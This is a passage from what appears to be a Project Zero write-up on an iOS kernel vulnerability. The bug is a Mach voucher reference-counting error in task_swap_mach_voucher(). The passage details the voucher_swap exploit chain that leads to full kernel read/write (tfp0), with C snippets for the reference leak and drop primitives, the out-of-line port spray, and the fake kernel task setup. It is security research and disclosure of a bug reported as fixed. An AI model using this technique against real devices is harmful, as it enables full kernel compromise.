    return KERN_SUCCESS;
}
This implementation does not respect the intended semantics:
  1. The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference.
  2. The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own.

Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count.
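Concretely, userspace can drive both issues through the MIG-generated stub. A minimal sketch (the real exploit also has to manage the voucher port the call hands back, which is elided here):

#include <mach/mach.h>

// Leak one reference on `voucher`: the kernel overwrites the reference
// it owns on *old without releasing it first.
static void voucher_leak_ref(mach_port_t voucher) {
    mach_port_t old = voucher;
    task_swap_mach_voucher(mach_task_self(), MACH_PORT_NULL, &old);
}

// Drop one reference on `voucher`: it comes back via *old, and the MIG
// wrapper consumes a reference the service routine never owned.
static void voucher_drop_ref(mach_port_t voucher) {
    mach_port_t old = MACH_PORT_NULL;
    task_swap_mach_voucher(mach_task_self(), voucher, &old);
}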
(Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.)

On vouchers

In order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation.
Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition:
/*
 * IPC Voucher
 *
 * Vouchers are a reference counted immutable (once-created) set of
 * indexes to particular resource manager attribute values
 * (which themselves are reference counted).
 */
struct ipc_voucher {
    iv_index_t      iv_hash;        /* checksum hash */
    iv_index_t      iv_sum;         /* checksum of values */
    os_refcnt_t     iv_refs;        /* reference count */
    iv_index_t      iv_table_size;  /* size of the voucher table */
    iv_index_t      iv_inline_table[IV_ENTRIES_INLINE];
    iv_entry_t      iv_table;       /* table of voucher attr entries */
    ipc_port_t      iv_port;        /* port representing the voucher */
    queue_chain_t   iv_hash_link;   /* link on hash chain */
};
As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library.
The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit.
As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic.
iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL.
In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one.

That's out of line!

There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers.
Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed.
But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless.
Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field. Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher.
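Put together, the setup might look like this sketch, simplified to a single voucher (the exploit actually works with a page of them); create_voucher() is a hypothetical helper wrapping host_create_mach_voucher(), and voucher_drop_ref() is the primitive sketched earlier:

// Leave ith_voucher dangling: stash the voucher pointer in the thread,
// erase the reference that stash took, then free the voucher.
mach_port_t voucher = create_voucher();                  // hypothetical helper
thread_set_mach_voucher(mach_thread_self(), voucher);    // ith_voucher takes a ref
voucher_drop_ref(voucher);                               // vulnerability: remove that ref
mach_port_deallocate(mach_task_self(), voucher);         // the voucher is freed
// ith_voucher now points to freed memory; thread_get_mach_voucher()
// will happily use it once we've reallocated the page.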
Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object.
In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid.
But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace.
This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers.
Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want.
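A sketch of the spray, assuming holder is a receive right we own and ports is laid out so that base_port overlaps iv_refs and MACH_PORT_NULL overlaps iv_port:

#include <mach/mach.h>

struct ool_msg {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool;
};

// Send one message whose out-of-line ports array will be copied into a
// kernel allocation the same size as a freed ipc_voucher page.
static void spray_ool_ports(mach_port_t holder, mach_port_t *ports,
                            mach_msg_size_t count) {
    struct ool_msg msg = {0};
    msg.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0)
                      | MACH_MSGH_BITS_COMPLEX;
    msg.hdr.msgh_size = sizeof(msg);
    msg.hdr.msgh_remote_port = holder;
    msg.body.msgh_descriptor_count = 1;
    msg.ool.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg.ool.address = ports;
    msg.ool.count = count;
    msg.ool.disposition = MACH_MSG_TYPE_COPY_SEND;
    msg.ool.copy = MACH_MSG_PHYSICAL_COPY;
    msg.ool.deallocate = FALSE;
    mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof(msg), 0, MACH_PORT_NULL,
             MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}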
Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic.
The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer.
This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot.
This gives us our working strategy to exploit this bug:
  1. Allocate a page of Mach vouchers.
  2. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability.
  3. Deallocate the voucher ports, freeing all the vouchers.
  4. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL.
  5. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports.
  6. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead.
  7. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port.

Pipe dreams

So what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port.
Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers. Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead.
At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors.

tfp0

Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic.
We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point.
We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory.
An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages.
In order to get the address of the pipe buffer we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer.
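In code, that registration is a single call; a minimal sketch, with fake_port and base_port as above:

#include <mach/mach.h>
#include <mach/notify.h>

// Registering a dead-name notification on the fake port makes the kernel
// allocate the ip_requests array, which then contains a pointer to
// base_port for our early read primitive to find.
static kern_return_t register_base_port_notification(mach_port_t fake_port,
                                                     mach_port_t base_port) {
    mach_port_t previous = MACH_PORT_NULL;
    return mach_port_request_notification(mach_task_self(), fake_port,
                                          MACH_NOTIFY_DEAD_NAME, 0,
                                          base_port,
                                          MACH_MSG_TYPE_MAKE_SEND_ONCE,
                                          &previous);
}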
At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory.
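A rough sketch of that relocation, under stated assumptions: tfp0 names the current fake kernel task port backed by the pipe buffer, while kernel_write() and ipc_entry_set_kobject() are hypothetical helpers standing in for the pipe-based write primitive and the ipc_entry patch described above.

#include <mach/mach.h>
#include <mach/mach_vm.h>

// Hypothetical helpers for this sketch, not real APIs.
extern void kernel_write(uint64_t kaddr, const void *data, size_t size);
extern void ipc_entry_set_kobject(mach_port_t name, uint64_t kobject);

static void relocate_kernel_task(mach_port_t tfp0,
                                 const void *fake_task, size_t size) {
    // Allocate fresh kernel memory that, unlike the pipe buffer, will
    // never be freed out from under us.
    mach_vm_address_t addr = 0;
    mach_vm_allocate(tfp0, &addr, size, VM_FLAGS_ANYWHERE);

    // Copy the new fake kernel task into the allocation, then point our
    // port's ip_kobject at it.
    kernel_write(addr, fake_task, size);
    ipc_entry_set_kobject(tfp0, addr);
}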
And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code.
Bug collision
I reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a, which fixed the issue. Since this would have been an incredibly quick turnaround for Apple, I suspected that the bug had been found and reported by another party first.
I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. S0rryMybad used this vulnerability as part of a remote jailbreak for the Tianfu Cup; you can read about his strategy for obtaining tfp0.
Conclusion
This post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state.
In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up.
This bug is also a good reminder that placeholder code can introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem.
And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers.
My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP.